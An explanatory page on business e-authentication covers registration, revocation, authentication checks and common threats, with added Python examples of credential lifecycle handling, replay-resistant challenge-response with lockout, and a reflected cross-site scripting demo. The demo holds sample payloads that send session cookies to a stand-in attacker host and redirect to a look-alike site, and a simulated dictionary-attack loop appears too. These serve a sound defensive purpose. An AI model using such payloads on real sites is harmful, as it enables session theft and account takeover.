e-Authentication for Business
Is e-Authentication required for my Business?
The Internet has revolutionised how information and services are delivered. Providing business functions online is now a prerequisite for a company to stay competitive. To automate core business processes, businesses have to give their users, including customers, suppliers and employees, access to corporate information and applications anytime, anywhere.
To prevent unauthorised users from gaining access to protected resources, secure authentication systems are required to ensure that users are who they claim to be.
What are the Processes Involved?
E-authentication is an important element in establishing trust in electronic transactions. Two major processes are involved:
1. Registration Process
The registration process normally consists of two major components, Registration and Revocation.
Registration
- to ensure that the claimed identity actually exists;
- to ensure that the applicant is who he/she claims to be;
- to ensure that the information associated with the identity is consistent, accurate and recorded; and
- to issue a credential, or record the details of an existing credential.
Revocation
- to withdraw and, where necessary, replace credentials on the holder's death, resignation or dismissal, change of name, cessation of trading or other significant change of circumstances;
- to withdraw and replace stolen or compromised credentials;
- to suspend credentials where there is suspicion of compromise, theft or a significant change of circumstances; and
- to withdraw credentials at the client's request.
2. Authentication Process
Authentication is the process of verifying the identity claimed by a user or party who attempts to send a message or access data. Its objectives are:
- to check that the credential is valid for the transaction in question; and
- to check that the credential presented has not expired, been revoked or withdrawn.
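To make the two processes concrete, the following is an added worked example; it is not code from the original page or from any e-authentication framework the page describes. It is a small in-memory credential registry that implements the registration and revocation operations listed above (issue, suspend, reinstate, revoke, replace) and an authentication check that applies each objective of the authentication process: possession of the credential, validity for the transaction in question, and not expired, revoked or suspended. The Registry class, the status names, the PBKDF2 parameters and the sample subject "alice" are all assumptions made for this example.

```python
"""Credential registry covering registration, revocation and authentication-time checks."""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from enum import Enum
import hashlib
import hmac
import os


class Status(Enum):
    ACTIVE = "active"
    SUSPENDED = "suspended"   # suspicion of compromise; may be reinstated after investigation
    REVOKED = "revoked"       # withdrawn; never becomes valid again


@dataclass
class Credential:
    subject: str              # the vetted identity the credential is bound to
    salt: bytes
    secret_hash: bytes
    expires_at: datetime
    transactions: frozenset   # transaction types this credential is valid for
    status: Status = Status.ACTIVE


def _hash_secret(secret: str, salt: bytes) -> bytes:
    # Salted PBKDF2; the iteration count is an assumption made for this example.
    return hashlib.pbkdf2_hmac("sha256", secret.encode(), salt, 100_000)


class Registry:
    def __init__(self) -> None:
        self._creds: dict[str, Credential] = {}

    # Registration: issue a credential bound to an identity that has already been vetted.
    def register(self, cred_id, subject, secret, validity, transactions, now):
        if cred_id in self._creds:
            raise ValueError("credential id already issued")
        salt = os.urandom(16)
        self._creds[cred_id] = Credential(subject, salt, _hash_secret(secret, salt),
                                          now + validity, frozenset(transactions))

    # Revocation: suspend on suspicion, withdraw on compromise or request, replace if needed.
    def suspend(self, cred_id):
        self._creds[cred_id].status = Status.SUSPENDED

    def reinstate(self, cred_id):
        cred = self._creds[cred_id]
        if cred.status is Status.SUSPENDED:   # a revoked credential cannot come back
            cred.status = Status.ACTIVE

    def revoke(self, cred_id):
        self._creds[cred_id].status = Status.REVOKED

    def replace(self, old_id, new_id, new_secret, validity, now):
        old = self._creds[old_id]
        self.revoke(old_id)
        self.register(new_id, old.subject, new_secret, validity, old.transactions, now)

    # Authentication: prove possession, then apply every check the process requires.
    def authenticate(self, cred_id, secret, transaction, now):
        cred = self._creds.get(cred_id)
        if cred is None:
            return False, "unknown credential"
        # Possession is checked first so status details are only disclosed to the holder.
        if not hmac.compare_digest(_hash_secret(secret, cred.salt), cred.secret_hash):
            return False, "bad secret"
        if cred.status is Status.REVOKED:
            return False, "revoked"
        if cred.status is Status.SUSPENDED:
            return False, "suspended"
        if now >= cred.expires_at:
            return False, "expired"
        if transaction not in cred.transactions:
            return False, "not valid for this transaction"
        return True, cred.subject


def demo():
    """Walk one credential through its lifecycle; constructed sample data, not real accounts."""
    now = datetime(2024, 1, 1, tzinfo=timezone.utc)
    reg = Registry()
    reg.register("alice-1", "alice", "correct horse", timedelta(days=365), {"view", "pay"}, now)
    out = {}
    out["ok"] = reg.authenticate("alice-1", "correct horse", "pay", now)
    out["wrong_secret"] = reg.authenticate("alice-1", "guess", "pay", now)
    out["wrong_txn"] = reg.authenticate("alice-1", "correct horse", "admin", now)
    out["expired"] = reg.authenticate("alice-1", "correct horse", "pay", now + timedelta(days=366))
    reg.suspend("alice-1")                     # suspicion of compromise
    out["suspended"] = reg.authenticate("alice-1", "correct horse", "pay", now)
    reg.reinstate("alice-1")
    reg.replace("alice-1", "alice-2", "new secret", timedelta(days=365), now)   # confirmed theft
    out["old_after_replace"] = reg.authenticate("alice-1", "correct horse", "pay", now)
    out["new_after_replace"] = reg.authenticate("alice-2", "new secret", "pay", now)
    return out
```

Calling demo() walks the credential through issue, suspension, reinstatement and replacement and returns the verdict of each authentication attempt. Note the ordering in authenticate: the secret is verified before status is reported, so an attacker cannot use the verifier as an oracle to learn whether a credential they do not hold has been suspended or revoked.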
What are the Common Threats?
Broadly speaking, there are three types of attack on the registration process:
- Impersonation
the attacker obtains a credential in another person's name; the person impersonated may be specifically targeted or chosen at random.
- Fictitious Subscriber
the attacker claims the identity of a non-existent person with the goal of creating a subscriber relationship.
- Rogue Registration Entity
an insider abuses a trusted position in the registration entity to create or obtain credentials, either as a genuine potential subscriber or in the name of a non-existent person.
There are also four main sources of threats during the authentication process:
- Eavesdropper / Replay Attack
an observer who captures authentication data as it crosses the network, for later analysis or to intercept the messages between the genuine parties, and then misuses what was captured to obtain tokens and pose as the rightful user. Eavesdropping is often combined with a replay attack, in which a valid data transmission is maliciously or fraudulently repeated or delayed.
- Password Guessing
the most common way an attacker tries to recover a password is a dictionary attack: the attacker takes a list of common words and names and tries each one as the password. The guessing is automated; a program can try hundreds or thousands of candidates per second against a live service, and far more against a stolen password hash offline.
- Session Hijacking
an attacker who takes over an already authenticated session and then poses as the genuine subscriber, or as the IT system, to learn sensitive information or to inject invalid input or output.
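An added example, not from the original page, showing how a verifier defends against the eavesdropper/replay and password-guessing threats just described. The server issues a single-use random nonce and accepts only an HMAC over that nonce, so a response captured on the wire is useless when replayed against the same or a later challenge; and it locks the account after a fixed number of failures, so an online dictionary attack stalls before it reaches the right word. The AuthServer class, the lockout threshold of five, the key derivation, the two users and the word list are all constructed for this example.

```python
"""Challenge-response authentication with single-use nonces and a failed-attempt lockout."""
import hashlib
import hmac
import os

# Constructed sample data for the example: a short guessing list (the real password is last).
WORDLIST = ["123456", "password", "qwerty", "letmein", "welcome", "dragon", "correct horse"]


def derive_key(password: str) -> bytes:
    # Plain SHA-256 keeps the example fast; a deployment would use a slow, salted KDF.
    return hashlib.sha256(b"example-salt:" + password.encode()).digest()


def client_response(key: bytes, nonce: bytes) -> bytes:
    """What the genuine client sends back: an HMAC over the server's nonce."""
    return hmac.new(key, nonce, hashlib.sha256).digest()


class AuthServer:
    MAX_FAILURES = 5   # assumed lockout threshold

    def __init__(self, users: dict) -> None:
        self._keys = users                        # user -> shared key
        self._outstanding: dict[str, bytes] = {}  # user -> nonce issued, not yet answered
        self._failures: dict[str, int] = {}

    def challenge(self, user: str) -> bytes:
        """Issue a fresh random nonce; an answer to any other nonce is never accepted."""
        nonce = os.urandom(16)
        self._outstanding[user] = nonce
        return nonce

    def respond(self, user: str, nonce: bytes, response: bytes) -> str:
        if self._failures.get(user, 0) >= self.MAX_FAILURES:
            return "locked"
        issued = self._outstanding.pop(user, None)   # consumed on first use
        if issued is None or not hmac.compare_digest(issued, nonce):
            return "replay"                           # stale, unknown or already-used challenge
        key = self._keys.get(user, b"")
        expected = hmac.new(key, nonce, hashlib.sha256).digest()
        if key and hmac.compare_digest(expected, response):
            self._failures[user] = 0
            return "ok"
        self._failures[user] = self._failures.get(user, 0) + 1
        return "bad response"


def dictionary_attack(server: AuthServer, user: str, wordlist) -> tuple:
    """Online guessing as the page describes it; returns the terminating outcome and attempt count."""
    for attempt, word in enumerate(wordlist, 1):
        nonce = server.challenge(user)
        outcome = server.respond(user, nonce, client_response(derive_key(word), nonce))
        if outcome in ("ok", "locked"):
            return outcome, attempt
    return "not found", len(wordlist)


def demo() -> dict:
    alice_key, bob_key = derive_key("s3cret-passphrase"), derive_key("correct horse")
    server = AuthServer({"alice": alice_key, "bob": bob_key})
    out = {}
    nonce = server.challenge("alice")
    captured = client_response(alice_key, nonce)      # the bytes an eavesdropper sees on the wire
    out["genuine"] = server.respond("alice", nonce, captured)
    out["replay_same_nonce"] = server.respond("alice", nonce, captured)   # nonce already consumed
    nonce2 = server.challenge("alice")
    out["replay_new_nonce"] = server.respond("alice", nonce2, captured)   # HMAC bound to old nonce
    out["dictionary"] = dictionary_attack(server, "bob", WORDLIST)       # locked before word 7
    return out
```

demo() returns the outcome of each scenario: the genuine exchange succeeds, the same bytes replayed are rejected because the nonce was consumed, the captured response fails against a fresh nonce because the HMAC is bound to the old one, and the dictionary attack is locked out on its sixth attempt, one short of the correct word. A lockout on its own invites denial of service against a named user, so in practice it is combined with per-source rate limiting and alerting rather than used alone.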
Other Sources of Threats
Other than in the registration and authentication processes, some security attacks may also lead to threats in electronic authentication.
- Phishing / Bogus website
the attacker sends fake e-mail messages that appear to come from a legitimate organisation and ask the victim to provide sensitive information (account ID, password, etc.), or that link to a fraudulent website where the victim is induced to enter it.
- System Intrusion
the attacker exploits vulnerabilities in computer systems to gain access and steal sensitive personal data, passwords and the like, for use in further attacks such as impersonation or taking control of accounts.
- Cross Site Scripting
the attacker injects malicious script into a page served by a legitimate website, typically through an input field or URL parameter that the site echoes back without sanitising, so that when the victim visits the page the script runs in the victim's browser with the trust of the legitimate site, stealing session cookies or other sensitive information or redirecting the victim to a fraudulent look-alike site.
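An added example of the cross-site scripting case above, not from the original page: a hypothetical search-results page that reflects a query parameter, rendered once without any encoding and once with HTML escaping, checked against two constructed payloads of the kind the text describes (cookie theft and a redirect to a look-alike site). The template, the tag-audit helper and the attacker.example / login-bank.example hostnames are assumptions made for this example.

```python
"""Reflected cross-site scripting: attacker input rendered raw versus HTML-escaped."""
import re
from html import escape

# Hypothetical search-results template; the only tags it legitimately contains are listed below.
TEMPLATE = "<html><body><p>Results for: {query}</p></body></html>"
TEMPLATE_TAGS = {"html", "body", "p"}

# Constructed payloads of the kind the text describes: cookie theft and a look-alike redirect.
COOKIE_THEFT = "<script>location='https://attacker.example/c?'+document.cookie</script>"
REDIRECT = "<img src=x onerror=\"location='https://login-bank.example/'\">"


def render_vulnerable(query: str) -> str:
    # The parameter is spliced in as markup, so the victim's browser executes whatever it contains.
    return TEMPLATE.replace("{query}", query)


def render_safe(query: str) -> str:
    # Escaping for the HTML text context: < > & " ' become entities and can no longer open a tag.
    return TEMPLATE.replace("{query}", escape(query, quote=True))


def injected_tags(page: str) -> set:
    """Tag names opened in the page that the template itself does not contain."""
    opened = {m.group(1).lower() for m in re.finditer(r"<\s*([a-zA-Z][a-zA-Z0-9]*)", page)}
    return opened - TEMPLATE_TAGS


def audit(query: str) -> dict:
    """Compare what each renderer lets through for one attacker-controlled query."""
    return {"vulnerable": injected_tags(render_vulnerable(query)),
            "safe": injected_tags(render_safe(query))}
```

audit(COOKIE_THEFT) reports a foreign script tag in the vulnerable rendering and none in the safe one; the payload text is still visible on the safe page, but only as inert text. Output encoding must match the context the value lands in (HTML body, attribute, JavaScript, URL), and it is usually backed up by marking session cookies HttpOnly so a script that does run cannot read them, and by a Content-Security-Policy that refuses inline script.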
What is e-Authentication Assurance Level?
Examples of Determining the Assurance Level